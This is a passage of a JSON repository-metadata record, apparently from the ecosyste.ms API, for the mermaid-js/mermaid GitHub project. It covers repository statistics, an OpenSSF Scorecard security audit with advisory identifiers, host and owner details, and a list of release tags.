markdown","archived":false,"fork":false,"pushed_at":"2025-09-01T12:33:10.000Z","size":254429,"stargazers_count":82566,"open_issues_count":1425,"forks_count":7984,"subscribers_count":651,"default_branch":"develop","last_synced_at":"2025-09-01T12:37:01.437Z","etag":null,"topics":["diagrams","diagrams-as-code","documentation","flowchart","javascript","mindmap","typescript","uml-diagrams"],"latest_commit_sha":null,"homepage":"https://mermaid.js.org","language":"TypeScript","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/mermaid-js.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":"CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":"CITATION.cff","codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["knsv","sidharthv96"]}},"created_at":"2014-11-01T23:52:32.000Z","updated_at":"2025-09-01T12:31:32.000Z","dependencies_parsed_at":"2023-09-29T07:58:18.084Z","dependency_job_id":"8c149ccb-df9c-4cb4-9e51-2f99157720cd","html_url":"https://github.com/mermaid-js/mermaid","commit_stats":{"total_commits":8230,"total_committers":688,"mean_commits":"11.962209302325581","dds":0.823086269744836,"last_synced_commit":"b3dee343d1536c8425539643c345a63ff58f59f4"},"previous_names":["knsv/mermaid"],"tags_count":181,"template":false,"template_full_name":null,"purl":"pkg:github/mermaid-js/mermaid","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/refs/heads/develop","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/sbom","scorecard":{"id":355670,"data":{"date":"2025-08-17T15:35:22Z","repo":{"name":"github.com/mermaid-js/mermaid","commit":"1f46c9e9bb556f9c321118407d0fa6788746e8b9"},"scorecard":{"version":"v5.1.1","commit":"cd152cb6742c5b8f2f3d2b5193b41d9c50905198"},"score":6.7,"checks":[{"name":"Dependency-Update-Tool","score":10,"reason":"update tool detected","details":["Info: detected update tool: RenovateBot: renovate.json:1"],"documentation":{"short":"Determines if the project uses a dependency update tool.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dependency-update-tool"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#packaging"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#code-review"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#binary-artifacts"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:22","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:23","Info: jobLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:30","Info: jobLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:21","Info: jobLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:21","Warn: jobLevel 'contents' permission set to 'write': .github/workflows/release.yml:17","Info: topLevel 'contents' permission set to 'read': .github/workflows/autofix.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/build-docs.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/check-readme-in-sync.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:11","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e-applitools.yml:17","Warn: topLevel 'contents' permission set to 'write': .github/workflows/e2e-timings.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/e2e.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/issue-triage.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/link-checker.yml:23","Warn: topLevel 'contents' permission set to 'write': .github/workflows/lint.yml:12","Info: topLevel 'contents' permission set to 'read': .github/workflows/pr-labeler.yml:15","Info: topLevel 'contents' permission set to 'read': .github/workflows/publish-docs.yml:11","Warn: no topLevel permission defined: .github/workflows/release-preview-publish.yml:1","Warn: topLevel 'actions' permission set to 'write': .github/workflows/release-preview.yml:14","Info: topLevel 'contents' permission set to 'read': .github/workflows/release-preview.yml:13","Info: topLevel 'contents' permission set to 'read': .github/workflows/release.yml:11","Info: topLevel permissions set to 'read-all': .github/workflows/scorecard.yml:9","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:6","Warn: no topLevel permission defined: .github/workflows/unlock-reopened-issues.yml:1","Warn: no topLevel permission defined: .github/workflows/update-browserlist.yml:1","Warn: no topLevel permission defined: .github/workflows/validate-lockfile.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#token-permissions"}},{"name":"Pinned-Dependencies","score":9,"reason":"dependency not pinned by hash detected -- score normalized to 9","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/validate-lockfile.yml:60: update your workflow using https://app.stepsecurity.io/secureworkflow/mermaid-js/mermaid/validate-lockfile.yml/develop?enable=pin","Warn: npmCommand not pinned by hash: .github/workflows/release-preview-publish.yml:32","Info:  45 out of  47 GitHub-owned GitHubAction dependencies pinned","Info:  35 out of  36 third-party GitHubAction dependencies pinned","Info:   1 out of   1 containerImage dependencies pinned","Info:   0 out of   1 npmCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#cii-best-practices"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#signed-releases"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#license"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 28 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#sast"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found linked content: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: github.com/mermaid-js/.github/SECURITY.md:1","Info: Found text in security policy: github.com/mermaid-js/.github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#security-policy"}},{"name":"Branch-Protection","score":1,"reason":"branch protection is not maximal on development and all release branches","details":["Warn: branch protection not enabled for branch 'release/10.9.3'","Warn: branch protection not enabled for branch 'release/10.9.2'","Info: 'allow deletion' disabled on branch 'develop'","Info: 'force pushes' disabled on branch 'develop'","Warn: branch 'develop' does not require approvers","Warn: codeowners review is not required on branch 'develop'","Info: status check found to merge onto on branch 'develop'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#branch-protection"}},{"name":"CI-Tests","score":9,"reason":"11 out of 12 merged PRs checked by a CI test -- score normalized to 9","details":null,"documentation":{"short":"Determines if the project runs tests before pull requests are merged.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#ci-tests"}},{"name":"Contributors","score":10,"reason":"project has 15 contributing companies or organizations","details":["Info: found contributions from: Mermaid-Chart, OSDKDev, argoproj, check-spelling, evolutionizer, fossgect, garnercorp, gecthrissur, john deere, mermaid chart, mermaid-chart, mermaid-js, plantuml-stdlib, ringcentral, sarva"],"documentation":{"short":"Determines if the project has a set of contributors from multiple organizations (e.g., companies).","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#contributors"}},{"name":"Vulnerabilities","score":0,"reason":"23 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-968p-4wvh-cqc8","Warn: Project is vulnerable to: GHSA-xffm-g5w8-qvg7","Warn: Project is vulnerable to: GHSA-jr5f-v2jv-69x6","Warn: Project is vulnerable to: GHSA-v6h2-p8h4-qcjw","Warn: Project is vulnerable to: GHSA-pxg6-pf52-xh8x","Warn: Project is vulnerable to: GHSA-3xgq-45jj-v275","Warn: Project is vulnerable to: GHSA-67mh-4wv8-2f99","Warn: Project is vulnerable to: GHSA-mg2h-6x62-wpwc","Warn: Project is vulnerable to: GHSA-fjxv-7rqg-78g4","Warn: Project is vulnerable to: GHSA-4www-5p9h-95mh","Warn: Project is vulnerable to: GHSA-9gqv-wp59-fq42","Warn: Project is vulnerable to: GHSA-76c9-3jph-rj3q","Warn: Project is vulnerable to: GHSA-rhx6-c78j-4q9w","Warn: Project is vulnerable to: GHSA-52f5-9888-hmc6","Warn: Project is vulnerable to: GHSA-c76h-2ccp-4975","Warn: Project is vulnerable to: GHSA-cxrh-j4jr-qwg3","Warn: Project is vulnerable to: GHSA-x574-m823-4x7w","Warn: Project is vulnerable to: GHSA-4r4m-qw57-chr8","Warn: Project is vulnerable to: GHSA-xcj6-pq6g-qj4x","Warn: Project is vulnerable to: GHSA-356w-63v5-8wf4","Warn: Project is vulnerable to: GHSA-859w-5945-r5v3","Warn: Project is vulnerable to: GHSA-4v9v-hfq4-rm2v","Warn: Project is vulnerable to: GHSA-9jgg-88mc-972h"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/cd152cb6742c5b8f2f3d2b5193b41d9c50905198/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T09:31:17.427Z","repository_id":37269779,"created_at":"2025-08-18T09:31:17.427Z","updated_at":"2025-08-18T09:31:17.427Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":273137429,"owners_count":25052011,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","status":"online","status_checked_at":"2025-09-01T02:00:09.058Z","response_time":120,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"mermaid-js","name":"mermaid-js","uuid":"57169982","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":"mermaidjs_","company":null,"icon_url":"https://avatars.githubusercontent.com/u/57169982?v=4","repositories_count":11,"last_synced_at":"2023-04-08T11:47:59.066Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/mermaid-js","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-14T05:34:15.747Z","updated_at":"2023-04-08T11:47:59.094Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/mermaid-js/repositories"},"tags":[{"name":"mermaid@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.1/manifests"},{"name":"@mermaid-js/tiny@11.10.1","sha":"af3bbdc5919e5b7d4678946a78c2034885f794ad","kind":"tag","published_at":"2025-08-22T12:08:19.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.1/manifests"},{"name":"v10.9.4","sha":"80dcf2eaad5b484ea41b5e0a8aee3fa8c5b99d34","kind":"commit","published_at":"2025-08-19T08:40:15.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/v10.9.4","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/v10.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@v10.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/v10.9.4/manifests"},{"name":"mermaid@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.10.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.9","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.9","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.9/manifests"},{"name":"@mermaid-js/tiny@11.10.0","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.10.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.10.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.2","sha":"96778f77898c02489ba0d33c874eca4370e21205","kind":"tag","published_at":"2025-08-19T08:05:08.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.2","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.2/manifests"},{"name":"mermaid@11.9.0","sha":"767754f4fbfe22e74e0612c5d684e9b58c3c5caf","kind":"commit","published_at":"2025-07-16T08:25:22.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.9.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.9.0/manifests"},{"name":"@mermaid-js/tiny@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.1/manifests"},{"name":"@mermaid-js/parser@0.6.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.1/manifests"},{"name":"mermaid@11.8.1","sha":"1aa28702245f9c874dc7b24ba20cb24d29a8bc17","kind":"tag","published_at":"2025-07-07T15:24:00.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.1/manifests"},{"name":"@mermaid-js/tiny@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.8.0/manifests"},{"name":"mermaid@11.8.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.8.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.8.0/manifests"},{"name":"@mermaid-js/parser@0.6.0","sha":"2b3cb6a362b81dad47cdbe246c1be97831c3b30f","kind":"tag","published_at":"2025-07-03T13:52:52.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.6.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.6.0/manifests"},{"name":"@mermaid-js/parser@0.5.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/parser@0.5.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/parser@0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fparser%400.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fparser@0.5.0/manifests"},{"name":"@mermaid-js/layout-elk@0.1.8","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/layout-elk@0.1.8","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/layout-elk@0.1.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Flayout-elk%400.1.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Flayout-elk@0.1.8/manifests"},{"name":"mermaid@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/mermaid@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/mermaid@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@mermaid%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/mermaid@11.7.0/manifests"},{"name":"@mermaid-js/tiny@11.7.0","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/tiny@11.7.0","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/tiny@11.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Ftiny%4011.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Ftiny@11.7.0/manifests"},{"name":"@mermaid-js/mermaid-zenuml@0.2.1","sha":"1f07a781e4d0d6ba196939a0ab1102698d749faf","kind":"tag","published_at":"2025-06-20T05:03:36.000Z","download_url":"https://codeload.github.com/mermaid-js/mermaid/tar.gz/@mermaid-js/mermaid-zenuml@0.2.1","html_url":"https://github.com/mermaid-js/mermaid/releases/tag/@mermaid-js/mermaid-zenuml@0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/mermaid-js/mermaid@%40mermaid-js%2Fmermaid-zenuml%400.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/mermaid-js%2Fmermaid/tags/@mermaid-js%2Fmermaid-zenuml@0.2.1/manifests"},{"name":"@mermaid-js/parser@0.4.0","sha":"7b2083926d